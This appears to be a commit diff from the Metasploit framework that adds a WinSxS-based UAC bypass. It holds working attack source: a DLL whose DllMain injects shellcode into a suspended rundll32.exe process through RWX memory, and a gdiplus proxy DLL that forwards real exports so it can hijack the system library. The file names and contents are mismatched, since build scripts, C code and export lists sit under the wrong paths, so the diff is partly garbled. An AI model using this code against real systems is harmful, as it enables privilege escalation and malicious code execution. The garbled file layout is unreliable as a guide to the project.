Land rapid7#8509, add Winsxs bypass for UAC

Author: bwatters-r7

data/post/bypassuac-x64.dll

@@ -0,0 +1,24 @@
+#
+# XXX: NOTE: this will only compile the x86 version.
+#
+# To compile the x64 version, use:
+# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
+# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
+#
+
+if [ -z "$PREFIX" ]; then
+  PREFIX=i686-w64-mingw32 
+fi
+
+rm -f *.o *.dll
+$PREFIX-gcc -c template.c
+$PREFIX-windres -o rc.o template.rc
+$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
+rm -f junk.tmp
+$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp #--def template.def
+rm -f base.tmp
+$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
+rm -f temp.exp
+
+$PREFIX-strip template_x86_windows.dll
+rm -f *.o

data/post/bypassuac-x86.dll

@@ -0,0 +1,97 @@
+#include <windows.h>
+#include "template.h"
+
+/* hand-rolled bzero allows us to avoid including ms vc runtime */
+void inline_bzero(void *p, size_t l)
+{
+   
+           BYTE *q = (BYTE *)p;
+           size_t x = 0;
+           for (x = 0; x < l; x++)
+                     *(q++) = 0x00;
+}
+
+void ExecutePayload(void);
+
+BOOL WINAPI
+DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
+{
+    switch (dwReason)
+    {
+        case DLL_PROCESS_ATTACH:
+			ExecutePayload();
+            break;
+
+        case DLL_PROCESS_DETACH:
+            // Code to run when the DLL is freed
+            break;
+
+        case DLL_THREAD_ATTACH:
+            // Code to run when a thread is created during the DLL's lifetime
+            break;
+
+        case DLL_THREAD_DETACH:
+            // Code to run when a thread ends normally.
+            break;
+    }
+    return TRUE;
+}
+
+void ExecutePayload(void) {
+    int error;
+	PROCESS_INFORMATION pi;
+	STARTUPINFO si;
+	CONTEXT ctx;
+	DWORD prot;
+   LPVOID ep;
+
+	// Start up the payload in a new process
+	inline_bzero( &si, sizeof( si ));
+	si.cb = sizeof(si);
+
+	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+	if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
+		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
+		GetThreadContext(pi.hThread, &ctx);
+
+	   ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
+
+#ifdef _WIN64
+	   ctx.Rip = (DWORD64)ep;
+#else
+	   ctx.Eip = (DWORD)ep;
+#endif
+
+        SetThreadContext(pi.hThread,&ctx);
+
+        ResumeThread(pi.hThread);
+        CloseHandle(pi.hThread);
+        CloseHandle(pi.hProcess);
+	}
+   // ExitProcess(0);
+   ExitThread(0);
+}
+
+/*
+typedef VOID
+(NTAPI *PIMAGE_TLS_CALLBACK) (
+    PVOID DllHandle,
+    ULONG Reason,
+    PVOID Reserved
+    );
+
+VOID NTAPI TlsCallback(
+      IN PVOID DllHandle,
+      IN ULONG Reason,
+      IN PVOID Reserved)
+{
+	__asm  ( "int3" );
+}
+
+ULONG _tls_index;
+PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
+IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
+*/
+

data/templates/src/pe/dll_gdiplus/build.sh

@@ -0,0 +1,3 @@
+EXPORTS
+DllMain@12
+

data/templates/src/pe/dll_gdiplus/template.c

@@ -0,0 +1,40 @@
+#define SCSIZE 2048
+unsigned char code[SCSIZE] = "PAYLOAD:";
+
+#ifdef _MSC_VER
+	#pragma comment (linker, "/export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc,@34")
+	#pragma comment (linker, "/export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush,@46")
+	#pragma comment (linker, "/export:GdipCloneImage=c:/windows/system32/gdiplus.GdipCloneImage,@50")
+	#pragma comment (linker, "/export:GdipCreateBitmapFromStream=c:/windows/system32/gdiplus.GdipCreateBitmapFromStream,@74")
+	#pragma comment (linker, "/export:GdipCreateFromHDC=c:/windows/system32/gdiplus.GdipCreateFromHDC,@84")
+	#pragma comment (linker, "/export:GdipCreateHBITMAPFromBitmap=c:/windows/system32/gdiplus.GdipCreateHBITMAPFromBitmap,@87")
+	#pragma comment (linker, "/export:GdipCreateLineBrushI=c:/windows/system32/gdiplus.GdipCreateLineBrushI,@97")
+	#pragma comment (linker, "/export:GdipCreateSolidFill=c:/windows/system32/gdiplus.GdipCreateSolidFill,@122")
+	#pragma comment (linker, "/export:GdipDeleteBrush=c:/windows/system32/gdiplus.GdipDeleteBrush,@130")
+	#pragma comment (linker, "/export:GdipDeleteGraphics=c:/windows/system32/gdiplus.GdipDeleteGraphics,@135")
+	#pragma comment (linker, "/export:GdipDisposeImage=c:/windows/system32/gdiplus.GdipDisposeImage,@143")
+	#pragma comment (linker, "/export:GdipFillRectangleI=c:/windows/system32/gdiplus.GdipFillRectangleI,@219")
+	#pragma comment (linker, "/export:GdipFree=c:/windows/system32/gdiplus.GdipFree,@225")
+	#pragma comment (linker, "/export:GdiplusShutdown=c:/windows/system32/gdiplus.GdiplusShutdown,@608")
+	#pragma comment (linker, "/export:GdiplusStartup=c:/windows/system32/gdiplus.GdiplusStartup,@609")
+#endif
+#ifdef __GNUC__
+	asm (".section .drectve\n\t.ascii \" -export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc @34\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush @46\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipCloneImage=c:/windows/system32/gdiplus.GdipCloneImage @50\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipCreateBitmapFromStream=c:/windows/system32/gdiplus.GdipCreateBitmapFromStream @74\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipCreateFromHDC=c:/windows/system32/gdiplus.GdipCreateFromHDC @84\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipCreateHBITMAPFromBitmap=c:/windows/system32/gdiplus.GdipCreateHBITMAPFromBitmap @87\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipCreateLineBrushI=c:/windows/system32/gdiplus.GdipCreateLineBrushI @97\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipCreateSolidFill=c:/windows/system32/gdiplus.GdipCreateSolidFill @122\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipDeleteBrush=c:/windows/system32/gdiplus.GdipDeleteBrush @130\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipDeleteGraphics=c:/windows/system32/gdiplus.GdipDeleteGraphics @135\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipDisposeImage=c:/windows/system32/gdiplus.GdipDisposeImage @143\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipFillRectangleI=c:/windows/system32/gdiplus.GdipFillRectangleI @219\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdipFree=c:/windows/system32/gdiplus.GdipFree @225\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdiplusShutdown=c:/windows/system32/gdiplus.GdiplusShutdown @608\"");
+	asm (".section .drectve\n\t.ascii \" -export:GdiplusStartup=c:/windows/system32/gdiplus.GdiplusStartup @609\"");
+#endif
+
+
+

data/templates/src/pe/dll_gdiplus/template.def

@@ -0,0 +1,18 @@
+
+LANGUAGE 9, 1
+
+
+VS_VERSION_INFO VERSIONINFO
+ FILEVERSION 0,0,0,1
+ PRODUCTVERSION 0,0,0,1
+ FILEFLAGSMASK 0x17L
+ FILEFLAGS 0x0L
+ FILEOS 0x4L
+ FILETYPE 0x2L
+ FILESUBTYPE 0x0L
+BEGIN
+
+END
+
+#define RT_HTML  23
+